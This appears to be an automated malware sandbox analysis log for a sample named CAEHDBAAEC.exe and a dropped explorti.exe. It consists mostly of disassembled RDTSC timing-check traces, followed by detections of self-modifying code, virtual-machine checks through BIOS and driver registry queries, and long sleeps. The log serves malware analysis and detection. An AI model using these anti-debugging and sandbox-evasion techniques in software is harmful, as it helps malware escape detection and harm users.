Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A30DC9 second address: 4A30DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, cx 0x0000000f movzx esi, bx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A30DDC second address: 4A30E1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FB4246CBDEDh 0x00000013 pop ecx 0x00000014 jmp 00007FB4246CBDF1h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A30E1B second address: 4A30E4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542851h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FB424542853h 0x00000012 movzx ecx, bx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A30F79 second address: 4A30FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007FB4246CBDF6h 0x00000011 ror eax, cl 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A30FAA second address: 4A30FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A30FAF second address: 4A40008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB4246CBDF2h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e leave 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ecx, edi 0x00000013 call 00007FB4246CBDEFh 0x00000018 pop esi 0x00000019 popad 0x0000001a mov cl, dh 0x0000001c popad 0x0000001d retn 0004h 0x00000020 nop 0x00000021 mov esi, eax 0x00000023 lea eax, dword ptr [ebp-08h] 0x00000026 xor esi, dword ptr [00592014h] 0x0000002c push eax 0x0000002d push eax 0x0000002e push eax 0x0000002f lea eax, dword ptr [ebp-10h] 0x00000032 push eax 0x00000033 call 00007FB428BBBE16h 0x00000038 push FFFFFFFEh 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40008 second address: 4A4000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A4000C second address: 4A40029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40029 second address: 4A40042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542851h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40042 second address: 4A40093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FB4246CBDEFh 0x0000000c adc ax, 146Eh 0x00000011 jmp 00007FB4246CBDF9h 0x00000016 popfd 0x00000017 popad 0x00000018 ret 0x00000019 nop 0x0000001a push eax 0x0000001b call 00007FB428BBBE88h 0x00000020 mov edi, edi 0x00000022 jmp 00007FB4246CBDEEh 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d mov si, bx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40093 second address: 4A40109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB424542852h 0x00000008 pop eax 0x00000009 movsx edx, ax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 mov di, 6FDEh 0x00000015 pushad 0x00000016 mov edx, 4E8A5D78h 0x0000001b pushfd 0x0000001c jmp 00007FB424542851h 0x00000021 xor ax, 9F66h 0x00000026 jmp 00007FB424542851h 0x0000002b popfd 0x0000002c popad 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007FB42454284Eh 0x00000034 mov ebp, esp 0x00000036 pushad 0x00000037 movzx ecx, bx 0x0000003a pushad 0x0000003b movsx ebx, cx 0x0000003e push eax 0x0000003f pop ebx 0x00000040 popad 0x00000041 popad 0x00000042 pop ebp 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40109 second address: 4A4010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A4010F second address: 4A40114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40114 second address: 4A40129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4246CBDF1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0008 second address: 49F000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F000E second address: 49F0014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0014 second address: 49F0018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0018 second address: 49F003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB4246CBDF7h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F003A second address: 49F0040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0040 second address: 49F0044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0044 second address: 49F0062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB42454284Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0062 second address: 49F0066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0066 second address: 49F006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F006C second address: 49F00EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 mov dx, si 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 jmp 00007FB4246CBDECh 0x0000001d xchg eax, ecx 0x0000001e jmp 00007FB4246CBDF0h 0x00000023 push eax 0x00000024 pushad 0x00000025 mov edi, 110187F4h 0x0000002a movsx ebx, cx 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f pushad 0x00000030 jmp 00007FB4246CBDF2h 0x00000035 mov ch, 94h 0x00000037 popad 0x00000038 push esi 0x00000039 jmp 00007FB4246CBDEAh 0x0000003e mov dword ptr [esp], ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FB4246CBDF7h 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F00EA second address: 49F0124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB42454284Fh 0x00000009 jmp 00007FB424542853h 0x0000000e popfd 0x0000000f movzx esi, bx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebx, dword ptr [ebp+10h] 0x00000018 pushad 0x00000019 mov bh, 07h 0x0000001b popad 0x0000001c push ebp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov ebx, ecx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0124 second address: 49F0128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0128 second address: 49F016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 call 00007FB424542858h 0x0000000c pop esi 0x0000000d mov eax, edx 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], esi 0x00000014 pushad 0x00000015 pushad 0x00000016 mov al, bl 0x00000018 mov edx, ecx 0x0000001a popad 0x0000001b mov si, 21EDh 0x0000001f popad 0x00000020 mov esi, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FB42454284Fh 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F016F second address: 49F01BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 call 00007FB4246CBDEBh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov ecx, 1EEE5601h 0x00000015 call 00007FB4246CBDEEh 0x0000001a mov dx, cx 0x0000001d pop eax 0x0000001e popad 0x0000001f mov dword ptr [esp], edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FB4246CBDF8h 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F01BA second address: 49F0214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB424542851h 0x00000009 sbb si, DF66h 0x0000000e jmp 00007FB424542851h 0x00000013 popfd 0x00000014 jmp 00007FB424542850h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test esi, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB424542857h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0214 second address: 49F029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FB496C0A1CAh 0x0000000f pushad 0x00000010 call 00007FB4246CBDECh 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 pushfd 0x00000019 jmp 00007FB4246CBDF1h 0x0000001e sub cx, 4236h 0x00000023 jmp 00007FB4246CBDF1h 0x00000028 popfd 0x00000029 popad 0x0000002a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000031 jmp 00007FB4246CBDEEh 0x00000036 je 00007FB496C0A18Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FB4246CBDEAh 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F029A second address: 49F02A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F02A0 second address: 49F0325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB4246CBDECh 0x00000009 or al, FFFFFFB8h 0x0000000c jmp 00007FB4246CBDEBh 0x00000011 popfd 0x00000012 mov ebx, eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov edx, dword ptr [esi+44h] 0x0000001a jmp 00007FB4246CBDF2h 0x0000001f or edx, dword ptr [ebp+0Ch] 0x00000022 pushad 0x00000023 mov dx, cx 0x00000026 pushfd 0x00000027 jmp 00007FB4246CBDEAh 0x0000002c sbb ax, 6548h 0x00000031 jmp 00007FB4246CBDEBh 0x00000036 popfd 0x00000037 popad 0x00000038 test edx, 61000000h 0x0000003e jmp 00007FB4246CBDF6h 0x00000043 jne 00007FB496C0A155h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0325 second address: 49F0329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F0329 second address: 49F032F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49F032F second address: 49F0335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0835 second address: 49E08DF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB4246CBDECh 0x00000008 sbb si, C5D8h 0x0000000d jmp 00007FB4246CBDEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FB4246CBDF6h 0x0000001c push eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB4246CBDF1h 0x00000024 xor cl, 00000026h 0x00000027 jmp 00007FB4246CBDF1h 0x0000002c popfd 0x0000002d push eax 0x0000002e pushfd 0x0000002f jmp 00007FB4246CBDF7h 0x00000034 xor si, 635Eh 0x00000039 jmp 00007FB4246CBDF9h 0x0000003e popfd 0x0000003f pop ecx 0x00000040 popad 0x00000041 xchg eax, ebp 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FB4246CBDEAh 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E08DF second address: 49E093A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c jmp 00007FB424542859h 0x00000011 and esp, FFFFFFF8h 0x00000014 pushad 0x00000015 mov cl, 8Bh 0x00000017 mov bx, 30FCh 0x0000001b popad 0x0000001c push edx 0x0000001d jmp 00007FB424542850h 0x00000022 mov dword ptr [esp], ebx 0x00000025 jmp 00007FB424542850h 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E093A second address: 49E0957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0957 second address: 49E099A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB424542853h 0x00000009 sub al, FFFFFFEEh 0x0000000c jmp 00007FB424542859h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushad 0x00000017 movsx ebx, ax 0x0000001a push eax 0x0000001b push edx 0x0000001c mov eax, 4DBF0705h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E099A second address: 49E099E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E099E second address: 49E09B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB42454284Dh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E09B5 second address: 49E09F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB4246CBDEAh 0x00000009 add ax, 9CC8h 0x0000000e jmp 00007FB4246CBDEBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB4246CBDF5h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E09F1 second address: 49E0A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB42454284Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0A01 second address: 49E0A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0A05 second address: 49E0A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d jmp 00007FB42454284Ch 0x00000012 test esi, esi 0x00000014 jmp 00007FB424542850h 0x00000019 je 00007FB496A881A4h 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FB42454284Eh 0x00000026 sub ax, 33E8h 0x0000002b jmp 00007FB42454284Bh 0x00000030 popfd 0x00000031 push esi 0x00000032 pop eax 0x00000033 popad 0x00000034 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FB42454284Ch 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0A6F second address: 49E0A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0A75 second address: 49E0AB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FB424542856h 0x00000016 add ax, EBD8h 0x0000001b jmp 00007FB42454284Bh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0AB5 second address: 49E0ACA instructions: 0x00000000 rdtsc 0x00000002 mov si, D28Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 je 00007FB496C116CBh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0ACA second address: 49E0ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0ACE second address: 49E0AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0AD4 second address: 49E0AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542856h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FB6968h], 00000002h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0AFB second address: 49E0B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0B01 second address: 49E0B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0B07 second address: 49E0B7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB496C1168Dh 0x0000000e jmp 00007FB4246CBDEAh 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 pushad 0x00000017 mov eax, 3547F99Dh 0x0000001c pushfd 0x0000001d jmp 00007FB4246CBDEAh 0x00000022 xor esi, 1F4FDAF8h 0x00000028 jmp 00007FB4246CBDEBh 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, ebx 0x00000030 jmp 00007FB4246CBDF6h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov di, cx 0x0000003c jmp 00007FB4246CBDF8h 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0B7D second address: 49E0BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FB424542856h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0BAA second address: 49E0BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0BAE second address: 49E0BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0BB2 second address: 49E0BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0C43 second address: 49E0C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0C47 second address: 49E0C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Special instruction interceptor: First address: 59EB27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Special instruction interceptor: First address: 59C54E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Special instruction interceptor: First address: 59EB2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C0EB27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C0C54E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C0EB2D instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Code function: 6_2_04A60000 rdtsc 6_2_04A60000
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3097 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2069 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1102 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 410 Jump to behavior
